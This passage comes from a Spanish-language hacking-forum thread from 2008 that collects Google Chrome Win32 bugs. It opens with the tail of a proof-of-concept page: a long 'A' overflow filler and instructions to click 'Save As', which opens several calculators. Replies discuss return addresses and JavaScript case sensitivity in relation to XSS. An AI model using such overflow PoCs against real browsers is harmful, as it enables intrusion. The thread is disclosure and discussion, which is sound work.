&#17843;&#41134;&#9062;&#41313;&#19979;&#12887;&#11663;&#24118;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  26. </head>
  28. Click 'Save As' function for checking this vulnerability. 
  29. Note: Opening multiple Calculators.
  30.  
  31. </body>
  32. </html>

Fuentes:
http://seclists.org/bugtraq/2008/Sep/0070.html
http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html
http://milw0rm.com/exploits/6367
En línea
- https://yhojann.cl/ - https://whk.cl/
Trancek

Desconectado Desconectado

Mensajes: 29


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #28 en: 6 Septiembre 2008, 15:33 pm »
berz3k es un stack-based buffer overflow, asi que usara algun Return Address que no este en tu sistema windows lo mas probable y por ello a lo mejor no te funcionara, digo yo..porque hay varias PoC, yo es que pase de bajarme todavia el Chrome, estoy agusto con firefox
En línea
http://www.p1mp4m.es
http://www.trancek.es
sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #29 en: 6 Septiembre 2008, 21:52 pm »
Cita de: WHK en  5 Septiembre 2008, 05:47 am
Citar
javascript:Alert("test");
Citar
javascript:alert("test");
Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts:
Citar
javascript:alert("test");
Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive.


Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs.
Falso
prueba poniendo Alert(123) en firefox ;)

De lo del BoF, pues que cagado jajaja.. aunque si funciona tengo screenshots :¬¬ jaja

Saludos!!
En línea
Leer reglas
- WarZone.elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
Páginas: 1 2 [3] 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
2 Google Bugs XSS&Redirect with using bit.ly (video)
Nivel Web 		sony1a2 8 5,698 Último mensaje 4 Enero 2011, 22:26 pm
por berz3k
Bugs hunter de Google
Hacking 		Panic0 0 1,911 Último mensaje 21 Octubre 2021, 18:48 pm
por Panic0
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines